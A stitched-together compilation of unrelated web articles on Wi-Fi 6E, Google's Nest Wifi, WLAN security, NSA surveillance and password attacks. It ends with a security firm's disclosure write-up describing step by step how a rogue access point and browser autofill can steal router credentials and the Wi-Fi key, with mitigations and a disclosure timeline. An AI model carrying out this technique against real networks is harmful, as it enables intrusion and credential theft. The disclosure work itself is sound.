Last September, Federal Communications Commission Chairman Ajit Pai mentioned that the FCC was interested in “opening up 1,200 megahertz of spectrum in the 6GHz band for different types of unlicensed uses,” including Wi-Fi.
Now it seems that the industry involving Wi-Fi-enabled devices is already gearing up to develop products that can make use of that freed up spectrum in the 6GHz band. According to a press release published on Friday, January 3, the Wi-Fi Alliance has even come up with a name for this new class of devices: Wi-Fi 6E. These devices are also expected to still offer the same features of Wi-Fi 6, namely things like faster data rates and lower latency.
As the Wi-Fi Alliance notes, it’s expected that once the 6GHz band is open for use, the kinds of devices that will use it first include “Wi-Fi 6E consumer access points and smartphones, followed by enterprise-grade access points.” In addition, Wi-Fi 6E is also expected to be adopted by “industrial environments” for uses such as “machine analytics, remote maintenance, or virtual employee training.” Other possible applications for 6GHz band and Wi-Fi 6E also include augmented reality and virtual reality.
Notably, the opening up of the 6GHz band for Wi-Fi is also expected to help deal with what the Wi-Fi Alliance refers to as a “Wi-Fi spectrum shortage.” This particular shortage means that the increasing demand for Wi-Fi will eventually surpass the actual capacity of the currently available unlicensed spectrum. By opening 6GHz to Wi-Fi, it’s expected that 6GHz will help fix the shortage “providing contiguous spectrum blocks to accommodate 14 additional 80 MHz channels and seven additional 160MHz channels which are needed for high-bandwidth applications that require faster data throughput such as high-definition video streaming and virtual reality.” In addition, the use of Wi-Fi 6E devices is supposed to use this increase in capacity to “to deliver greater network performance and support more Wi-Fi users at once, even in very dense and congested environments.”
As the release of Wi-Fi 6E products are still pending the official regulatory approval of the opening up of 6GHz band to Wi-Fi, it’s still unknown when those products will be made available to the public, but companies are expected to move quickly once the approval goes through.
With the promise of speedy internet for every room, Google's new mesh Wi-Fi system wants to give Google Assistant a bigger footprint in our homes.
Available in your choice of three colors, Nest Wifi Points extend the range of Nest Wifi setups -- and they double as Google Assistant smart speakers, too.
Juan Garzon/CNET
Google on Tuesday announced the launch of the Nest Wifi, a refreshed version of the company's popular mesh router system, Google Wifi. Available for pre-order today and set to arrive November 4, the system is comprised of a Nest Wifi Router that plugs into your modem and separate Nest Wifi Points that wirelessly extend the reach of its signal -- and which themselves double as Google Assistant smart speakers.
A two-piece setup with the Nest Wifi Router and one Nest Wifi Point will cost $269. A three-piece setup with the Nest Wifi Router and two Nest Wifi Points will cost $349, and promises to cover homes of up to 3,800 square feet. That's enough coverage for 85% of homes in the US, Google says.
Mesh, meet Google Assistant
Beyond spreading a speedy internet signal throughout your home, the Nest Wifi promises to spread the voice-activated intelligence of Google Assistant around your house, too. That's because each of those Nest Points now doubles as a fully functional Google Assistant smart speaker, complete with always-listening microphones and touch controls on the top of the device.
The goal, Google says, is to get users to keep these things out in the open as opposed to hiding them out of sight, where they won't relay their signals as well. To that end, the new Nest Wifi Points also come in your choice of three colors (snow, sand or mist), and you can buy one on its own for $149. The Nest Router only comes in white, and costs $169 on its own.
You'll see an ambient glow from the light ring around the base of the Nest Point whenever it's sending audio to Google's cloud to come up with a response. When the mics are muted, the ring will glow orange.
James Martin/CNET
"We realized that performance for the Wifi Point would double if it was off the floor, not hidden in a closet," said Ben Brown, Google product lead for the Nest Wifi. "Having a great design, having something you actually want to interact with, and having the Assistant on the device makes it actually so it's a much better Wi-Fi system."
You can use a Nest Wifi Point just like you'd use one of Google's other smart speakers, like the Nest Mini, which also made its debut today. You get its attention by saying "OK Google," and then you give it a question or a command, including new Wi-Fi-specific commands like asking for a speed test or to pause Wi-Fi to specific devices or groups of devices. A ring of white light around the base of the device will glow whenever it hears you, and to let you know that it's connecting with Google's cloud to come up with a response. If you want to turn the mics off, just flip the mute switch in the back.
We haven't had a whole lot of time to give it a close listen for ourselves, but Google says that the sound quality in each Nest Point is stronger than you might expect. That's because the need for extra space inside the device for the antennas and for heat dispersion means that there's also plenty of room to push sound around via the downward firing speaker, Brown says.
As for the touch controls on the top face of each marshmallowy device, you can tap the center to pause or resume playback, or tap the sides to turn the volume up and down. Like with the new Nest Mini, a set of indicator lights will glow when your hand draws near to show you where to aim for those volume controls.
Now playing:Nest Wifi puts Google Assistant into your router
3:25
Faster than before -- but where's Wi-Fi 6?
That new Nest Router is an AC2200 model, which means that it supports current-gen Wi-Fi 5 connections with a maximum combined speed of about 2,200 Mbps across all bands -- up from about 1,200 Mbps last time around. Your actual speed will be a lot lower, since you can only connect to one band at a time, but like Google Wifi before, Nest Wifi will automatically "steer" you from band to band as you move about your house in order to keep your connection as swift and steady as possible.
Another upgrade: Nest Wifi now boasts four antennas for up to four simultaneous wireless connections (4x4). If you're using a client device like a MacBook Pro that can take advantage of those multiple antennas, then you'll be able to combine the speed of those simultaneous streams for a faster Wi-Fi experience.
You can spread Nest Wifi Points around your home to triangulate a better internet connection in every room. The previous version of the system is our top-rated mesh setup.
James Martin/CNET
All of the new hardware is also backwards compatible with first-gen Google Wifi setups, so you'll be able to add the new Nest Point extenders with their built-in speakers to your system if you've already bought in. And, if you decide to upgrade to the new Nest Router, your old Google WiFi access points will be able to connect to it and extend its signal, too.
As for the lack of support for next-gen Wi-Fi 6 features, Google suggests that it's still too early for the emerging standard in people's homes.
"It's really only 2022 by which point you're going to have a critical mass of [Wi-Fi 6] devices in the home, at which point Wi-Fi 6 will make sense in the home," said Sanjay Noronha, product lead for Nest Wifi. "And so, our philosophy is how do we make these products useful today?"
Google likely wants to keep its routers affordable, too. For reference, the Wi-Fi 6-ready version of Netgear Orbi, due out later this month, is slated to cost $700 for a two-pack with the router and a single satellite extender. Prices like that are out of reach for too many potential users, Noronha said.
Meanwhile, the newest Wi-Fi 5 version of Netgear Orbi costs $149 for a two-pack, and it supports built-in smart speaker functionality if you add in the $300 Orbi Voice extender with Alexa. Another competitor worth keeping an eye on: Amazon-owned Eero, which just released a new version of its Wi-Fi 5 mesh system as a $249 three-pack. That price is half the cost of the original, and an excellent indication that competition is heating up in the mesh category.
"We recognize that there's going to continue to be an evolution of technology, and we will continue to work on those evolutions," Brown said, "but we also want to make sure that we're delivering the best possible experience for everyone. And I think that we are very confident that this is what [Nest Wifi] represents today. And for the next, you know, five years, honestly."
Today’s Wi-Fi networks are now more secure than the typical wired network in the same building. While that may seem like a bold opening statement, today this is often the case.
It is true that WLANs got off to a chequered start 20 years ago, with attackers finding ways around the early security procedures and protocols in place. Consequently, though, the industry devoted a great deal of effort and innovation towards making WLANs much more secure – and they succeeded. There are, however, still challenges in securing any network.
As we know, wireless “leaks out” to the surrounding environment, which means passers-by can see and attempt to connect to any network they choose. As a response, we need to put steps in place to mitigate this threat. For wired networks, physical barriers with locks on the doors and containment physically within the building are the traditional wired networking means of defense. However, if a person with malicious intent is able to gain physical access, perhaps through social engineering, or tail-gating, a device can be connected and access gained which, then, is an opportunity for an attack to commence.
So how have WLANs been addressing security concerns? What has the result of all that investment and innovation been?
Wi-Fi Security Methods
The Gold standard is the use of Digital Certificates. This method is preferable because, unlike user-created passwords, certificates are virtually impossible to replicate. However, this method is also the most complex to deploy for the network administrator. Unless a friendly, user self-service Enrolment System is used to automate the authorization, creation, and distribution of certificates and secure WLAN setup for users can become a time-consuming task.
The Silver standard is a username and password-based authentication – often linked to a user database such as Microsoft Active Directory. This works well, but network administrators need to implement with care, making sure that proper server certificates are deployed to ensure users address a legitimate server, and that user passwords are suitably complex. Interestingly, both password complexity and frequency of change need not be as onerous as imagined and are well explained here.
We must accept that there will be a need to support some devices that cannot support the gold or silver methods. Such equipment often compromises devices that have crossed over from the home market to the workplace as digital transformation has taken hold – smart speakers, video streamers and casters, as well as other IoT devices. Limited to Pre-Shared Key authentication, in the commercial world, the use of a unique static key per device, called Dynamic Pre-Shared Key, provides enhanced security and limitation of a breach if one key is discovered.
2019 will see the introduction of a further security enhancement called WPA3. This new Wi-Fi security standard will replace WPA2, and improve the encryption strength and ease of setup of the methods discussed above.
Role Based Access – with a suitable WLAN infrastructure, the above access methods can map to user roles. Define what is allowed for a user type and apply rules accordingly. Roles provide a plethora of controls, from VLAN allocation, through to simple port and protocol-based firewall rules up to application-based recognition and control, including URL filtering.
Public WiFi is a growing part of everyday life. When your clients provide public WiFi, they have an obligation to protect users – but uncontrolled internet usage brings high risk. Download this guide, which covers five steps MSPs can take to protect their client’s public WiFi from hacking and other threats.
Topics covered include:
* Bandwidth and content filtering rules. * DNS- layer protection. * Separate Internet-enabled SSID and wireless isolation. * User agreements. * Positioning WiFi access points wisely. Access now:
Wireless security has two components: Authentication and secrecy. And, in theory, responsibility for network security lies with both operators and users.
Operators of Wi-Fi (or WLAN) access points should make sure that only those authorized can access the network and consume its resources. In more specific cases, an operator might want to know what each user does on the network and limit the number of devices they can access.
Users of Wi-Fi networks should also have the ability to authenticate it themselves, although they rarely do. When connecting to a network, you mostly have no guarantee you are connecting to the entity you think you are connecting to.
It’s important for both users and operators to have the ability to secure communications while they are traversing the air. Otherwise, anyone within reach of the signal would be able to eavesdrop on the connections and possibly inject data.
Ideally, all communications should at all times be encrypted. Due to what we consider a pretty serious design flaw, however, data sent between the router and your device is only encrypted if there is a password set. It’s important to note, though, that the password is not the key used to encrypt the data. Instead, a new key is negotiated for each user and session.
Authenticating Wi-Fi networks
It is theoretically possible to encrypt all data even without setting a password, but current Wi-Fi standards don’t have this ability (the newly released WPA3 standard does). As such, you should always set a password to your network, even if you later print the password on signs for everyone in the building to see.
Primarily, passwords are used for authentication (only users that know a password can log into the network). But, as everybody uses the same password there is little to prevent people from sharing it with outsiders and (non-authorized) friends. Some apps even make password sharing possible between a large number of strangers.
While far more complicated from an administration perspective, It is possible to create individual accounts with unique passwords for each authorized user or device. Additionally, this setup also makes it possible to track unique users around the building or network and eject them from the system.
It is also possible to use certificates to authenticate your connection to the correct router. These certificates, however, have to be verified through another secure channel and this feature is rarely used.
Wi-Fi standards and security
The standard known as Wi-Fi is defined under IEEE 802.11. It has been amended frequently to account for new bands, frequencies, and changes in technology (such as authentication and encryption).
Currently, there are two primary standards to secure Wi-Fi and encrypt connections: WEP and WPA.
WEP (Wired Equivalent Privacy, often also wrongly called Wireless Encryption Protocol), released in 1997, was, for a time, the only standard available. And, due to U.S. export controls, it was intentionally weak and insecure. As soon as the U.S. removed these restrictions, WEP was superseded by WPA and WPA2 (Wi-Fi Protected Access) in 2004.
WPA and WPA2 were released together, with WPA as an intermediate solution for hardware that couldn’t support WPA2. Since 2012, WPA is considered broken and defunct.
WPA3 is here, but it’s not ready
Specifications for WPA3 were announced in early 2018, but the standard is still not commonly available in software packages and hardware. WPA3 increases security and privacy, for example by encrypting all connections by default, and offers perfect forward secrecy.
As the operator of a Wi-Fi access point, you should always use WPA2 as it is still the most robust standard.
Enable encryption on your network to make sure all your guests and users benefit from encrypted data while in transit between your router and their device.
Change the passwords to your router’s admin interface to make it difficult for anybody to mess with your network and install spyware and malware on it.
If you are worried about unauthorized access to your network, change passwords frequently and consider creating unique username and passwords for each user.
If you are worried about your guests doing nefarious things through your internet connection, consider installing a VPN on your router to avoid being blamed for the actions of your guests.
As the user of a Wi-Fi network, you should prefer encrypted connections over unencrypted ones. Use a browser extension with HTTPS Everywhere for greater end-to-end encryption.
Use a VPN for your phone or laptop to fully encrypt your data as it passes the airwaves, the Wi-Fi router, and the ISP.
Five years on from the revelations that the U.S. National Security Agency (NSA) collects personal data on every American—and many more people worldwide—the storm has passed.
It is important to learn about the methods the NSA uses to spy on citizens. Once you understand how your liberties are violated, you can start defending your data and reclaim your privacy.
Let’s take a look at 8 methods the NSA is using to spy on you right now, according to documents leaked by Edward Snowden and further investigation by the press.
How the NSA spies on you in America
1. They can access your phone records
In 2017, the NSA acquired data from over 534 million phone calls and text messages. Unbelievably, this tally is over triple the amount collected in 2015, when the USA Freedom Act supposedly limited NSA access to data from communication companies.
2. Your favorite internet services pass your data to the NSA
Facebook, Google, Apple, and six other leading online services have all gone on record as having given their customers’ data to the NSA, as legally required by the “PRISM” program. Data shared includes emails, messages, and documents.
3. The NSA can hack your devices
The NSA’s hacking unit, Tailored Access Operations, has developed a whole range of hacking exploits. These enable the NSA to break into consumer electronics devices and IT systems as it sees fit. When the NSA finds a security hole in a popular consumer device, they do not, as previously intended, fix the security hole, but instead exploit it. That leaves all our devices vulnerable to hackers.
4. All your security devices are exploitable thanks to the NSA
The NSA has also made the job of hacking security devices easier for itself, by coercing many manufacturers into building vulnerabilities into products such as networking switches, firewalls, and encryption protocols. These vulnerabilities are known to the NSA, which can exploit them at any time. The NSA also intercepts shipments of computers and phones and plants backdoors in them.
5. The NSA can track you wherever you are
When you move around your town, cell phone towers can calculate your exact position. The NSA keeps records of where you are at any time, and they can read all your incoming text messages and phone calls and store them indefinitely.
How the NSA spies on you overseas
6. The NSA has tapped internet lines worldwide
The internet connects different continents via undersea fiber optic cables that carry truly massive amounts of data. In some places, the NSA has deals with local intelligence agencies to tap into these cables; in others, it does so on its own. The NSA even uses submarines to attach snooping bugs to wires deep beneath in the ocean.
7. The NSA hack foreign companies
In Brazil, Germany and other countries, the NSA has broken into the internal networks of major telecommunications providers, intercepting the data they gather and weakening the security of their systems. They collect every email and phone call they can.
8. The NSA knows exactly what you own and buy
The NSA has access, through agreements and hacking, to major credit card networks, payment gateways, and wire transfer facilities. This allows them to follow every cent of your money, where it comes from, and what you are spending it on.
Protect yourself from government surveillance
While the NSA’s reach extends across the globe, there is still a lot you can do to safeguard your internet privacy. Check out this list of top privacy tips and always be conscious of what you’re sharing, with whom you’re sharing, and how you share it.
Welcome to Cyber Threats 101! This is the fifth chapter in our A Busy College Student’s Guide to Online Security. We’ll begin by defining what are password attacks and share expert tips on how to avoid becoming a victim to these attacks.
What are password attacks?
Password attacks are methods that take advantage of stolen, weak and/or reused passwords used to protect online accounts. In fact, 81 percent of hacking-related breaches in 2016 was the result of an attacker leveraging stolen and/or weak passwords.
Hackers can use one or more strategies to “guess” or crack encrypted passwords, including brute force attacks, dictionary attacks, and keyloggers. Before we get into these attacks, you must first know what encryption is.
What is encryption?
Encryption is the process of encoding messages or information in such a way that only authorized parties can read it. It transforms data that you send across the Internet into a format which is only readable when in possession of a decryption key, which provides the code to decipher the encryption.
Brute Force Attacks take a “try-try again” approach to guess password possibilities using automation software. Starting with one-digit passwords, the program will continue to guess longer combinations of letters, numbers, and symbols.
To get a better idea of how brute force attacks work, take a look at this short video from Lynda.com:
What are dictionary attacks?
Dictionary Attacks are based on the idea that we love to use names, places, sports teams, slang, etc. in our passwords. This method also uses automation software to guess different password combinations based on commonly used words that could be found in the dictionary.
What are keyloggers?
Keyloggers are malicious programs hackers implant on a target’s computer system–commonly through phishing emails–and are used to track and record every keystroke you make. It can record passwords, social security numbers, phone numbers, and even your credit card information.
Why shouldn’t I reuse a password on multiple accounts?
You should avoid reusing the same password on multiple accounts because hackers are known to use stolen or weak passwords from a massive data breach or from a password attack to deface your public profiles, commit identity fraud, steal your financial information, or send malicious messages or emails under your name.
Learn from the mistake of Facebook CEO Mark Zuckerberg who’s LinkedIn credentials were compromised in a massive data breach from 2012, which lead to a hacker group also compromising his Pinterest and Twitter pages; not to mention his password was “dadada“.
Here are 5 tips to help you create a strong password:
Create a password that is–at a minimum–8 characters long. Ideally, your password should be between 12-15 characters.
Create a memorable, yet complex password by using a password mnemonic or a passphrase. You can start with a phrase, sentence, song lyric, etc. that is meaningful to you, but wouldn’t make sense to an automated computer program. You can also add a few numbers and special symbols for complexity.
Use a mix of case-sensitive letters, numbers, and symbols, but you won’t get away with replacing an “S” with a “$” or changing an “A” to “@”. In reality, hackers and automated password attack programs are already one step ahead of you and can easily pick up on these patterns.
Struggling to remember your new password? Write down a hint–not your password–that will jog your memory, but will be meaningless to anyone else. Then, keep it in a safe place.
UPDATE (5th September 2018). Since we published our original report, Google has now resolved the underlying vulnerability. The latest update of Chrome (tested against version 69.0.3497.81) addresses the issue we highlighted in this blog, where credentials are auto-filled on unencrypted HTTP pages. This makes the attack require significantly more user interaction, in the same way that Firefox, Edge Internet Explorer and Safari do. This makes the exploit much closer to a phishing attack and much less likely to succeed.
It is important to note that the latest version of Opera is still vulnerable as of 2018-09-05, but will hopefully also be quickly patched. This is a positive response from Google and is great to see following our original report to them in March 2018.
As per our originally-proposed solution, it would also be great to see Microsoft adjust captive portals in Windows to behave in a similar way to those in MacOS (separate browser) and for router manufacturers to enforce HTTPS management by defaults on their devices. These changes would further limit this vector of attack.
Original Article:
During a recent engagement we found an interesting interaction of browser behaviour and an accepted weakness in almost every home router that could be used to gain access a huge amount of WiFi networks.
The browser behaviour relates to saved credentials. When credentials are saved within a browser, they are tied to a URL and automatically inserted into the same fields when they are seen again. The accepted home router weakness is simply the use of unencrypted HTTP connections to the management interfaces.
By combining these two components it was possible to gain access to various networks without cracking a single handshake, which is the currently most-used method of gaining access to a WPA/WPA2 network but requires a weak passphrase. The attack should work on most networks, but there are a few pre-requisites that need to be met for the attack to succeed:
There MUST be an active client device on the target network
Client device MUST have previously connected to any other open network and allowed automatic reconnection
Client device SHOULD* be using a Chromium-based browser such as Chrome or Opera
Client device SHOULD** have the router admin interface credentials remembered by the browser
Target network’s router admin interface MUST be configured over unencrypted HTTP
Without those five pre-requisites, the attack is not possible. However, those are all somewhat likely occurrences given that most browsers prompt users to save credentials automatically. The main pre-requisites that lower the likelihood are Chromium usage and saved router credentials, but this will still affect a huge number of people.
*Firefox, IE/Edge and Safari require significant user interaction, so attack does work, but is more of a social engineering based. With Chrome it is significantly more seamless. **If the router’s admin interface credentials are not saved, it is still possible to attempt to guess default values
It is also important to note that the attack has been demonstrated against home routers by extracting the WiFi key directly from the web interface. However, other devices can be targeted if they have a semi-predictable URL that is exposed over unencrypted HTTP. Many IoT devices fit into this category but none were specifically tested here.
Before getting to the meat of the attack, we are assuming that you are already familiar with the Karma/Jassager attack. Karma is used in part of the workflow and if you are not familiar with it, consider reading the following article:
Step 1. Bring the client device onto a network we control:
The first step is to start sending deauthentication requests with aireplay-ng and with the Karma attack using ‘hostapd-wpe’, both with an Alfa AWUS036NHA.
Step 2. Trigger the browser to load our URL:
We did this with ‘dnsmasq’ and a Python script. When we see a HTTP request, we create a response redirecting to our URL and serve our own page.
The URL and served page are different depending on the router we’re targeting. We can detect which URL/Page pair to send based on BSSID and ESSID or just take a guess, the range of options is limited anyway.
There are some extra options for redirection too. By default, we allow HTTPS through untouched and wait for an HTTP request. But if this is taking too long, triggering captive portal detection on Windows will automatically launch the default browser at a URL we specify. However, there are limitations to triggering a captive portal, primarily against MacOS, which launches a separate browser specific to dealing with captive portals, preventing us from accessing stored credentials.
Step 3. Steal the autocomplete credentials:
This is where things get interesting. When our page loads, the browser makes two initial checks.
Does our URL origin match the router’s admin interface origin (protocol & IP address/hostname)
Do the input fields on the page match what the browser remembers of the router’s interface
If these two checks pass, then the browser automatically populates our page with the saved credentials. In this case, the router’s admin details. Naturally these input fields are completely hidden from the target.
If the target is using Chrome, there is one more step: The Chromium feature “PasswordValueGatekeeper” requires a user to interact with the page in some way. A click anywhere on the page is fine, and after the click we can harvest the credentials.
If the target is using Firefox, Internet Explorer, Safari or Edge, then we can’t have the input fields hidden. The attack would still work, but only if the target clicks on our form field and select their credentials from the drop-down instead. At this point the attack is mostly social engineering.
But let’s not stop here, these credentials are almost useless right now. There’s even a good chance we might have guessed them before we even started the attack (for example, admin:password) but we can’t use them from our current position on the outside of the network.
Step 4. Send the target to their home WiFi
Once we have the credentials, we want the target to keep our page open just a little longer. At this point we stop our Karma attack, releasing the target back to their own network.
Once the target device is successfully connected back to their original network, our page is sitting on the router admin interface’s origin with the admin credentials loaded into JavaScript. We then login using an XMLHttpRequest and grab the PSK or make whatever changes we need. In most WiFi routers that we tested, we could extract the WPA2 PSK directly from the web interface in plaintext, negating the entire need to capture a handshake to the network. But if a router hides the key, we could enable WPS with a known key, create a new access point or anything else we can do from within the router’s interface.
We wouldn’t even need to know the HTML structure of the router’s interface. We could just grab the entire page DOM, send it home and extract anything useful by hand. Using BeEF Project it would also be possible to proxy through to the page, granting the attacker access to the router interface as if they were logged in directly.
Solution
Fundamentally this is just a flaw in the way origins are shared and trusted between networks. In the case of home routers, they are predictable enough to be a viable target.
The easiest solution would be for browsers to avoid automatically populating input fields on unsecured HTTP pages. It is understandable that this would lower usability, but it would greatly increase the barrier to credential theft.
The most complete solution would be to implement HTTPS with trusted keys and certificates on these devices. But this requires support for custom HTTPS certificates as well as your own certificate management infrastructure, in an enterprise this is commonplace but for home users this is extremely unlikely. Vendors might consider implementing HTTPS on their devices by default, but those keys could simply be stolen by anyone with one of the devices by reverse-engineering the firmware.
Microsoft could also make the process more difficult to exploit by using a separate captive portal browser instead of simply launching the default browser similar to how MacOS behaves.
Disclosure Timeline
Chromium:
SureCloud: Disclosed March 2nd
Chromium: Response Received March 2nd (“working as designed”)
Microsoft
SureCloud: Disclosed March 27th
SureCloud: Chase Sent April 13th
[Microsoft’s messages were all being flagged as spam]
Microsoft: Response Received May 25th (Clarification requested)
SureCloud: Clarification Sent June 4th
Microsoft: Case opened June 5th
Microsoft: Requested disclosure details June 6th
SureCloud: Clarification sent June 6th
Microsoft: Flagged for consideration, but no immediate action June 21st
Asus
SureCloud: Disclosed March 21st
Asus: Responded March 22nd (Discussing with engineers)
SureCloud: Discussing solutions April 4th
SureCloud: Sent notice to publish May 25th
Asus: Discussing solutions June 11th
SureCloud: Discussing solutions and notice to publish July 11th
Following the discussions with ASUS, it’s became clear we’d exhausted all options for ethical disclosure with this Proof of Concept.
References
While this was only discovered after disclosing to Chromium, someone named Chris had beaten us to the underlying idea. We have however taken it much further and demonstrated a real-world attack.
These are Proof of Concept only and the community will no doubt take this attack much further. The long-term goal is to build a module for the WiFi Pineapple to automate the attack, with this is expected in the coming months.
Video
Mitigations
As highlighted we are exploiting ‘by design’ features, which will hopefully change with public release of this article. However, in the meantime there are a few key steps that can be taken to help protect yourself:
Only login to your router using a separate browser or incognito session
Clear your browser’s saved passwords and don’t save credentials for unsecure HTTP pages
Delete saved open networks and don’t allow automatic reconnection
As it is nearby impossible to tell if this attack has already happened against your network, change your pre-shared keys and router admin credentials ASAP. Again, use a separate/private browser for the configuration and choose a strong key.
